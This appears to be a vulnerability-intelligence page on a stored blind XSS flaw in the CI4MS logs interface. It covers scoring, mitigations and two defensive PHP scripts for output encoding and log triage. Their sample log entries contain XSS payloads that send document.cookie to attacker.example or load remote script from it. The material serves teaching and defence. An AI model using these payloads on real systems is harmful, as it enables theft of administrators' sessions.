Cyber Posture

CVE-2026-34560

Critical · Public PoC

Published: 01 April 2026
Modified: 13 April 2026
KEV Added: not listed
Patch: available (0.31.0.0)
CVSS Score: 9.1 (CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:L/A:L)
EPSS Score: 0.0002 (6.4th percentile)
Risk Priority: 18 (weighted 60% EPSS, 20% KEV, 20% CVSS)

Summary

CVE-2026-34560 is a critical-severity stored cross-site scripting (CWE-79) vulnerability in CI4MS (ci4-cms-erp/ci4ms). Its CVSS v3.1 base score is 9.1 (Critical).

Exploitation maps to the MITRE ATT&CK technique Browser Session Hijacking (T1185). EPSS ranks it at the 6.4th percentile by predicted exploitation likelihood (below the median); it is not currently listed in the CISA KEV catalog; a public proof-of-concept is referenced. Read the low EPSS value for what it measures: the probability of exploitation in the wild across the internet population, not difficulty. With a public PoC and low attack complexity, any low-privileged user of a vulnerable instance can plant the payload, so an internal-facing deployment should not treat the percentile as reassurance.

The strongest mitigations our analysis identified are NIST 800-53 SI-15 (Information Output Filtering) and SI-2 (Flaw Remediation).

Threat & Defense at a Glance

What attackers do: exploitation maps to Browser Session Hijacking (T1185) and Steal Web Session Cookie (T1539). What defenders deploy: see the NIST 800-53 controls recommended below.

Threat & Defense Details

Mitigating Controls (NIST 800-53 r5), AI-generated analysis

SI-15 Information Output Filtering (prevent): directly requires filtering information prior to output to web pages to prevent cross-site scripting attacks, addressing the unsafe rendering of user-controlled log data in the logs interface. This is the control the fix implements: log content is encoded for the HTML context at render time.

SI-2 Flaw Remediation (prevent): mandates timely remediation of identified flaws such as this stored XSS vulnerability by applying the patch in CI4MS version 0.31.0.0.

SI-10 Information Input Validation (prevent): enforces validation of information inputs to restrict malicious XSS payloads from being accepted and stored in application logs. Treat this as a secondary control here: a log sink has to record faithfully whatever the application saw, including attacker-controlled strings, so rejecting or rewriting input before it is logged cannot be relied on as the fix. Output encoding at render time (SI-15) is what removes the vulnerability.
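As an added illustration, not code from CI4MS or the advisory, the following stand-alone PHP script contrasts the raw-interpolation pattern behind this bug with output encoding in the HTML body context, which is what SI-15 calls for. The function names, the sample log entries and the stillExecutable() check are constructed for this example; in a CodeIgniter 4 view the equivalent of h() is the framework's esc() helper.

```php
<?php
declare(strict_types=1);

// Constructed sample entries standing in for rows read back from an application log.
// The second and third messages carry payloads of the kind a low-privileged user could
// get into a log line (for instance through a logged failed-login username).
$entries = [
    ['level' => 'INFO',  'message' => 'User alice logged in'],
    ['level' => 'ERROR', 'message' => 'Login failed for "<script>new Image().src=\'https://attacker.example/c?\'+document.cookie</script>"'],
    ['level' => 'ERROR', 'message' => 'Bad value: " autofocus onfocus="alert(document.domain)'],
];

// Vulnerable pattern: the stored string is concatenated straight into the page,
// which is what an unescaped <?= $message ?> in a view amounts to.
function renderRowUnsafe(array $e): string
{
    return '<tr><td>' . $e['level'] . '</td><td>' . $e['message'] . '</td></tr>';
}

// Hardened pattern: every untrusted value is encoded for the HTML body context before
// it is emitted. This is a plain-PHP stand-in for CI4's esc($value) helper.
function h(string $s): string
{
    return htmlspecialchars($s, ENT_QUOTES | ENT_SUBSTITUTE | ENT_HTML5, 'UTF-8');
}

function renderRowSafe(array $e): string
{
    return '<tr><td>' . h($e['level']) . '</td><td>' . h($e['message']) . '</td></tr>';
}

// Crude check used only to show the difference: after removing the table markup we
// emitted ourselves, does the output still contain a tag or attribute boundary that
// came from the log data?
function stillExecutable(string $html): bool
{
    $payloadPart = preg_replace('#</?t[rd]>#', '', $html);
    return (bool) preg_match('/<|>|"/', $payloadPart);
}

foreach ($entries as $e) {
    $unsafe = renderRowUnsafe($e);
    $safe   = renderRowSafe($e);
    printf("unsafe executable=%s  safe executable=%s\n",
        stillExecutable($unsafe) ? 'yes' : 'no',
        stillExecutable($safe) ? 'yes' : 'no');
    echo "  safe row: {$safe}\n";
}
```

Run with `php render.php`. The first entry is inert in both renderings; the second and third are executable only in the unsafe rendering, because the encoded version turns `<`, `>` and both quote characters into entities and the browser never sees a tag or attribute boundary. Note that htmlspecialchars() is correct for the HTML body and quoted attribute contexts only; a log value placed inside a script block or a URL needs the context-specific encoders (esc($value, 'js') and esc($value, 'url') in CI4).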

MITRE ATT&CK Enterprise Techniques, AI-generated analysis

T1185 Browser Session Hijacking (Collection)
Adversaries may take advantage of security vulnerabilities and inherent functionality in browser software to change content, modify user behaviors, and intercept information as part of various browser session hijacking techniques.
T1539 Steal Web Session Cookie (Credential Access)
An adversary may steal web application or service session cookies and use them to gain access to web applications or Internet services as an authenticated user without needing credentials.

Why these techniques?

Stored XSS in the logs interface allows a low-privileged user to inject a JavaScript payload that executes in an administrator's browser context, directly enabling browser session hijacking (T1185) and theft of web session cookies (T1539), hence the high confidentiality impact. Marking the session cookie HttpOnly denies the payload direct access to it through document.cookie, but script running in the administrator's origin can still issue authenticated requests from that session, so the cookie flag narrows T1539 without closing T1185.

Confidence: HIGH · MITRE ATT&CK Enterprise v18.1

NVD Description

CI4MS is a CodeIgniter 4-based CMS skeleton that delivers a production-ready, modular architecture with RBAC authorization and theme support. Prior to version 0.31.0.0, the application renders user-controlled input unsafely within the logs interface. If any stored XSS payload exists within logged data, it is rendered without proper output encoding. This issue becomes a Blind XSS scenario because the attacker does not see immediate execution. Instead, the payload is stored within application logs and only executes later when an administrator views the logs page. This issue has been patched in version 0.31.0.0.

Deeper analysis, AI-generated

CVE-2026-34560 is a stored cross-site scripting (XSS) vulnerability, classified under CWE-79, affecting CI4MS, a CodeIgniter 4-based CMS skeleton that provides a production-ready, modular architecture with RBAC authorization and theme support. In versions prior to 0.31.0.0, the logs interface renders user-controlled content from application logs without output encoding, so a payload that reaches the logs persists there and is later emitted into the page as live markup.

This is a blind XSS scenario: a low-privileged user (PR:L) with network access (AV:N) injects a payload into data the application logs and does not observe immediate execution. The payload stays dormant until an administrator opens the logs page, at which point it runs in the administrator's browser. The CVSS v3.1 vector (AC:L/UI:N/S:C/C:H/I:L/A:L) rates the confidentiality impact high, since the payload can exfiltrate the administrator's session data, with low integrity and availability impact. The changed scope (S:C) records that the impact lands in the administrator's browser rather than in the vulnerable logging component. One caveat when prioritising: the vector carries UI:N even though execution only occurs once an administrator views the logs page; routine administrative activity is often scored as not counting as user interaction, but the bug does not fire without it.

The fix is CI4MS version 0.31.0.0, which encodes the log data rendered in the logs interface. Upgrade to 0.31.0.0 or later; see the project's GitHub release notes (https://github.com/ci4-cms-erp/ci4ms/releases/tag/0.31.0.0) and security advisory (https://github.com/ci4-cms-erp/ci4ms/security/advisories/GHSA-r4v5-rwr2-q7r4). Log files written before the upgrade may already contain payloads; because the defect is in the view rather than in the stored data, the upgrade neutralises those too, but an unpatched instance should be treated as unsafe to use for log review until it is updated.
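The timeline above (inject, persist, execute when an administrator opens the page) means payloads may be sitting in log files now. The following added PHP script, not part of CI4MS or the advisory, parses log lines in the "LEVEL - date --> message" layout that CodeIgniter 4's file log handler writes by default (an assumption about the deployment) and flags entries containing markup or script indicators, so the files can be triaged from a shell rather than through the affected page. The log text, function names and indicator patterns are constructed for this example.

```php
<?php
declare(strict_types=1);

// Constructed log text in the default CodeIgniter 4 file-handler layout.
// Continuation lines (stack traces, multi-line messages) do not start with a level.
$logText = <<<'LOG'
INFO - 2026-04-01 09:12:03 --> User alice logged in
ERROR - 2026-04-01 09:14:47 --> Login failed for "<script src=https://attacker.example/x.js></script>"
ERROR - 2026-04-01 09:15:10 --> Validation error: name
 must not be empty
WARNING - 2026-04-01 09:16:22 --> Bad value: "><img src=x onerror=fetch('//attacker.example/'+document.cookie)>
INFO - 2026-04-01 09:17:00 --> Report "Q1 <draft>" exported
LOG;

// Indicators that a message carries HTML/JS rather than ordinary text. They are
// deliberately broad: a missed payload costs far more than a false positive in triage.
const XSS_INDICATORS = [
    'tag'        => '/<\s*\/?\s*[a-z][a-z0-9-]*[\s>\/]/i',
    'handler'    => '/\bon[a-z]+\s*=/i',
    'js_scheme'  => '/javascript\s*:/i',
    'script_src' => '/\bsrc\s*=\s*["\']?\s*(https?:)?\/\//i',
];

/** Group raw lines into entries: a new entry starts where a line begins with a level. */
function parseEntries(string $text): array
{
    $entries = [];
    foreach (preg_split('/\R/', rtrim($text)) as $line) {
        if (preg_match('/^(EMERGENCY|ALERT|CRITICAL|ERROR|WARNING|NOTICE|INFO|DEBUG) - (\S+ \S+) --> (.*)$/', $line, $m)) {
            $entries[] = ['level' => $m[1], 'time' => $m[2], 'message' => $m[3]];
        } elseif ($entries !== []) {
            // Continuation line: append to the message of the entry in progress.
            $entries[array_key_last($entries)]['message'] .= "\n" . $line;
        }
    }
    return $entries;
}

/** Return every entry whose message matches at least one indicator, with the reasons. */
function findSuspiciousEntries(array $entries): array
{
    $hits = [];
    foreach ($entries as $i => $e) {
        $reasons = [];
        foreach (XSS_INDICATORS as $name => $re) {
            if (preg_match($re, $e['message'])) {
                $reasons[] = $name;
            }
        }
        if ($reasons !== []) {
            $hits[] = [
                'index'   => $i,
                'time'    => $e['time'],
                'level'   => $e['level'],
                'reasons' => $reasons,
                'snippet' => substr($e['message'], 0, 80),
            ];
        }
    }
    return $hits;
}

$hits = findSuspiciousEntries(parseEntries($logText));
foreach ($hits as $h) {
    printf("[%s] %s %s: %s\n", implode(',', $h['reasons']), $h['time'], $h['level'], $h['snippet']);
}
echo count($hits) . " suspicious entries\n";
```

Point it at copies of the files under writable/logs/ (the default CI4 log directory) and review hits on a host that is not the affected instance. On the constructed input it reports three entries: the script tag with a remote src, the image tag with an onerror handler, and the benign "Q1 <draft>" line, which is the expected false positive. The patterns favour recall over precision, so a hit is a lead to look at, not a finding.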

Details

CWE(s)

CWE-79 Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')

Affected Products

ci4-cms-erp ci4ms < 0.31.0.0 (fixed in 0.31.0.0)

CVEs Like This One

CVE-2026-35035 (same product: ci4-cms-erp ci4ms)
CVE-2026-34561 (same product: ci4-cms-erp ci4ms)
CVE-2026-27599 (same product: ci4-cms-erp ci4ms)
CVE-2026-34989 (same product: ci4-cms-erp ci4ms)
CVE-2026-34559 (same product: ci4-cms-erp ci4ms)
CVE-2026-34564 (same product: ci4-cms-erp ci4ms)
CVE-2026-34566 (same product: ci4-cms-erp ci4ms)
CVE-2026-34563 (same product: ci4-cms-erp ci4ms)
CVE-2026-34568 (same product: ci4-cms-erp ci4ms)
CVE-2026-34569 (same product: ci4-cms-erp ci4ms)

References

https://github.com/ci4-cms-erp/ci4ms/security/advisories/GHSA-r4v5-rwr2-q7r4
https://github.com/ci4-cms-erp/ci4ms/releases/tag/0.31.0.0